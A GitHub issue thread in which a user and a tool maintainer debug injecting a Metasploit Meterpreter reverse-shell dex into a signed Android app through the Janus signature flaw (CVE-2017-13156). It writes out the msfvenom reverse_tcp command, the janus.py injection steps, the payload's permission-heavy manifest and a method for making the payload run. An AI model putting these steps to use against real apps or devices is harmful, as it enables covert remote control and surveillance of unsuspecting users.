Help

[serrapa]

I tried it on a vulnerable apk. I generated the .dex file with msfvenom than I used this tool to inject my payload.dex. However, if I analyze the generated apk with jadx-gui, I cannot find any references to my evil payload (msfvenom). Do you know why? Am I doing something wrong?

[giacomoferretti]

Hi @serrapa,
what you experienced is expected, as the injected .dex is not considered a valid file within the ZIP (APK) file. For this reason, JaDX is unable to parse it.

Try viewing the raw data with a hex editor and see if the .dex is placed correctly at the beginning of the file.

[serrapa]

Hey thanks for the response! Yes I was wrong, I checked the size of the apk at the end and obviously it’s greater… dont know why I didn’t do it before… anyway, I could not get the shell back, still I dont understand why, I tried it on emulator and on a real device but nothing… have your ever tried to exploit the vuln in this way?

[giacomoferretti]

No, I have never tried it that way. This project came in handy in 2019, as a popular app had not used signature v2 and I needed to keep the original signature. Now I use https://github.com/giacomoferretti/odex-patcher (unmaintaned for now, needs root access).

Does the application crash? Check the logcats, and if so send them here.
If not, try to inject a simple app that uses a single Activity, with a single TextView as the content.
If that doesn't work, we'll need to dig deeper.

[serrapa]

Sorry actually I didn’t try it on a real device because I didnt have one with api < 24.. I tried on the emulator and I though there were problems at network level… I set up the metasploit handler on my localhost and I created the shell with the remote host being 10.0.2.2 (the alias for the loopback interface for the emulator, as stated in the android docs)… Dont know if there would be some limitations by doing this way… btw I ll try creating the activity with the textview as you say and I ll let you knew asap! Thank you soo much!

[serrapa]

I tried creating two projects on Android Studio (one benign app and one evil). Both of them are projects based on "Empty Views Activity" template and print a single log line:

• "BENIGN", "This log line is legit."
• "EVIL", "This log line is evil."

The following are the steps I followed:

1. apktool d benign-release.apk -o benign-release
2. python3 manifest_dummy.py benign-release/AndroidManifest.xml manifest
3. cat manifest/manifest.xml

        <provider android:name="androidx.startup.InitializationProvider" android:authorities="fot.pcegi"/>
	<receiver android:name="androidx.profileinstaller.ProfileInstallReceiver"/>
</application>

4. Add the two class (as normal Java classes that extends android.content.ContentProvider and android.content.BroadcastReceiver

package androidx.profileinstaller;

import android.content.Context;
import android.content.Intent;

public class ProfileInstallReceiver extends  android.content.BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {

    }
}

package androidx.startup;

import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;

import androidx.annotation.NonNull;
import androidx.annotation.Nullable;

public class InitializationProvider extends  android.content.ContentProvider{
    @Override
    public boolean onCreate() {
        return false;
    }

    @Nullable
    @Override
    public Cursor query(@NonNull Uri uri, @Nullable String[] projection, @Nullable String selection, @Nullable String[] selectionArgs, @Nullable String sortOrder) {
        return null;
    }

    @Nullable
    @Override
    public String getType(@NonNull Uri uri) {
        return null;
    }

    @Nullable
    @Override
    public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
        return null;
    }

    @Override
    public int delete(@NonNull Uri uri, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }

    @Override
    public int update(@NonNull Uri uri, @Nullable ContentValues values, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }
}

5. python3 extract_dex.py evil-debug.apk evil.dex
6. python3 janus.py evil.dex benign-release.apk benign-release-injected.apk (app installed successfully)
7. Started the benign-release-injected app that crashed. Here the logs:

023-11-25 16:03:44.298 16826-16826 System                  com.poc.benign                       W  ClassLoader referenced unknown path: /data/app/com.poc.benign-1/lib/arm64
2023-11-25 16:03:44.299 16826-16826 AndroidRuntime          com.poc.benign                       D  Shutting down VM
2023-11-25 16:03:44.299 16826-16826 AndroidRuntime          com.poc.benign                       E  FATAL EXCEPTION: main
                                                                                                    Process: com.poc.benign, PID: 16826
                                                                                                    java.lang.RuntimeException: Unable to get provider androidx.startup.InitializationProvider: java.lang.ClassNotFoundException: Didn't find class "androidx.startup.InitializationProvider" on path: DexPathList[[zip file "/data/app/com.poc.benign-1/base.apk"],nativeLibraryDirectories=[/data/app/com.poc.benign-1/lib/arm64, /vendor/lib64, /system/lib64]]
                                                                                                    	at android.app.ActivityThread.installProvider(ActivityThread.java:5156)
                                                                                                    	at android.app.ActivityThread.installContentProviders(ActivityThread.java:4748)
                                                                                                    	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4688)
                                                                                                    	at android.app.ActivityThread.-wrap1(ActivityThread.java)
                                                                                                    	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1405)
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:102)
                                                                                                    	at android.os.Looper.loop(Looper.java:148)
                                                                                                    	at android.app.ActivityThread.main(ActivityThread.java:5417)
                                                                                                    	at java.lang.reflect.Method.invoke(Native Method)
                                                                                                    	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
                                                                                                    	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
                                                                                                    Caused by: java.lang.ClassNotFoundException: Didn't find class "androidx.startup.InitializationProvider" on path: DexPathList[[zip file "/data/app/com.poc.benign-1/base.apk"],nativeLibraryDirectories=[/data/app/com.poc.benign-1/lib/arm64, /vendor/lib64, /system/lib64]]
                                                                                                    	at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
                                                                                                    	at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
                                                                                                    	at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
                                                                                                    	at android.app.ActivityThread.installProvider(ActivityThread.java:5141)
                                                                                                    	at android.app.ActivityThread.installContentProviders(ActivityThread.java:4748) 
                                                                                                    	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4688) 
                                                                                                    	at android.app.ActivityThread.-wrap1(ActivityThread.java) 
                                                                                                    	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1405) 
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:102) 
                                                                                                    	at android.os.Looper.loop(Looper.java:148) 
                                                                                                    	at android.app.ActivityThread.main(ActivityThread.java:5417) 
                                                                                                    	at java.lang.reflect.Method.invoke(Native Method) 
                                                                                                    	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726) 
                                                                                                    	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616) 
                                                                                                    	Suppressed: java.io.IOException: No original dex files found for dex location /data/app/com.poc.benign-1/base.apk
                                                                                                    		at dalvik.system.DexFile.openDexFileNative(Native Method)
                                                                                                    		at dalvik.system.DexFile.openDexFile(DexFile.java:295)
                                                                                                    		at dalvik.system.DexFile.<init>(DexFile.java:80)
                                                                                                    		at dalvik.system.DexFile.<init>(DexFile.java:59)
                                                                                                    		at dalvik.system.DexPathList.loadDexFile(DexPathList.java:279)
                                                                                                    		at dalvik.system.DexPathList.makePathElements(DexPathList.java:248)
                                                                                                    		at dalvik.system.DexPathList.<init>(DexPathList.java:120)
                                                                                                    		at dalvik.system.BaseDexClassLoader.<init>(BaseDexClassLoader.java:48)
                                                                                                    		at dalvik.system.PathClassLoader.<init>(PathClassLoader.java:65)
                                                                                                    		at android.app.ApplicationLoaders.getClassLoader(ApplicationLoaders.java:58)
                                                                                                    		at android.app.LoadedApk.getClassLoader(LoadedApk.java:376)
                                                                                                    		at android.app.LoadedApk.makeApplication(LoadedApk.java:568)
                                                                                                    		at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4680)
                                                                                                    		... 8 more
                                                                                                    	Suppressed: java.lang.ClassNotFoundException: androidx.startup.InitializationProvider
                                                                                                    		at java.lang.Class.classForName(Native Method)
                                                                                                    		at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
                                                                                                    		at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
                                                                                                    		at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
                                                                                                    		... 12 more
                                                                                                    	Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available

Don't understand what is wrong.. I just noticed that the evil.dex file is just 20 byte, is it right looking for \x50\x4b\x03\x04 ? here https://github.com/V-E-O/PoC/blob/8c389899e6c4e16b2ddab9ba6d77c2696577366f/CVE-2017-13156/janus.py is different

[giacomoferretti]

extract_dex.py is not for extracting classes.dex files from a valid APK file, as written in the README it is for extracting the .dex file from an already injected APK file. It is not entirely your fault, but a misnomer on my part 😅

You need to extract the correct classes.dex file manually from the APK file.

[giacomoferretti]

Damn, I coded it really badly... lol

[serrapa]

Aah I see.. anyway I also tried doing:

• python3 janus.py classes.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes2.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes3.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes4.dex benign-release.apk benign-release-injected.apk

No ones worked ahaha. Digging deeper I think the problem is also multidexing, so I tried to build my evil apk without multidex (enabled by default on android studio), but I got errors because there are two instances of androidx.startup. InitializationProvider and androidx.profileinstaller.ProfileInstallReceiver... so I tried to remove androidx dependencies from the project, but the com.google.android.material:material:1.10.0 dependency is based on androidx, so fuck all ahaha.

Instead if a generate the evil dex with msfvenom this way for example msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex, the app does not crash but I cannot see any connection, neither with wireshark (I hope at least on the tentative towards 10.0.2.2:4444, but nothing...)

[giacomoferretti]

Does the injected app have the android.permission.INTERNET permission?

[giacomoferretti]

• python3 janus.py classes.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes2.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes3.dex benign-release.apk benign-release-injected.apk
• python3 janus.py classes4.dex benign-release.apk benign-release-injected.apk

Yes, forgot to mention that I've tested it with only one classes.dex file. You can try to inject them in the reverse order (classes4.dex, classes3.dex, ...), I don't know if it works.

[giacomoferretti]

msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

Also, doesn't msfvenom -p android/meterpreter_reverse_tcp output an APK file? Be sure to extract the correct classes.dex.

[serrapa]

Does the injected app have the android.permission.INTERNET permission?

Yes

Yes, forgot to mention that I've tested it with only one classes.dex file. You can try to inject them in the reverse order (classes4.dex, classes3.dex, ...), I don't know if it works.

yeah, I supposed you tested with one dex... btw, also in the reverse order does not change, the app crashes with the same errors logs as above

[giacomoferretti]

Can you share the output file for this? msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

I don't have Metasploit installed, nor Kali Linux.

Thank you.

[serrapa]

Also, doesn't msfvenom -p android/meterpreter_reverse_tcp output an APK file? Be sure to extract the correct classes.dex.

Ooh yes, I totally forgot, but still not change ahah.. I just tried with the classes.dex inside the output of apktool d --no-src meterpreter.dex -o meterpreter

Can you share the output file for this? msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

It is not much and helpful

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 72706 bytes
Saved as: meterpreter.dex

[giacomoferretti]

The meterpreter.dex file, not the console output.

[serrapa]

meterpreter.dex.zip

I needed to convert it as a zip because I cannot upload it as is on github...

[giacomoferretti]

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.metasploit.stage" platformBuildVersionCode="10" platformBuildVersionName="2.3.3">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-feature android:name="android.hardware.camera"/>
    <uses-feature android:name="android.hardware.camera.autofocus"/>
    <uses-feature android:name="android.hardware.microphone"/>
    <application android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <data android:host="my_host" android:scheme="metasploit"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>
        <receiver android:label="MainBroadcastReceiver" android:name=".MainBroadcastReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:name=".MainService"/>
    </application>
</manifest>

Note: all the permissions, receivers and services added will not be available once injected, because Android parse the correct AndroidManifest.xml inside the original APK.

[giacomoferretti]

You could try to:

1. Create a dummy app to generate the missing receivers, etc. of the target app using manifest_dummy.py
2. Decode the dummy APK using apktool d -o dummy
3. Decode meterpreter.dex using apktool d -o exploit
4. Copy over the missing receivers, etc. inside the extracted meterpreter.dex
5. Build the decoded meterpreter.dex using apktool b exploit
6. Extract the classes.dex file from exploit.apk
7. Inject it using janus.py

[serrapa]

You're right.. but so how can I get code execution via a bad dex by exploiting the Janus vuln? Because also with the classes dex files from my evil.apk does not work (the app crashes)

[serrapa]

I ll try

[serrapa]

Extract the classes.dex file from exploit.apk

Here you mean with extract_dex.py?

Btw, the process looks like that one I did above with the evil and benign app. With less steps because I used the classes dex file from the evil app and not form meterpreter.apk (i call it .apk and not dex because it s confusing)

[giacomoferretti]

Here you mean with extract_dex.py?

No, just extract it as a normal Zip file

[giacomoferretti]

Btw, the process looks like that one I did above with the evil and benign app. With less steps because I used the classes dex file from the evil app and not form meterpreter.apk (i call it .apk and not dex because it s confusing)

Yes, it's similar. The thing is that the generated APK file from Metasploit is probably not compatible with the target app (because of receivers, etc), so you want the code from the Metasploit APK, but with the missing stuff from the target app (by using manifest_dummy.py).

[giacomoferretti]

@serrapa any updates?

[serrapa]

Hey! I still have to try it, didn't have time these days.. I will notify here as soon as I'm done

[giacomoferretti]

Perfect!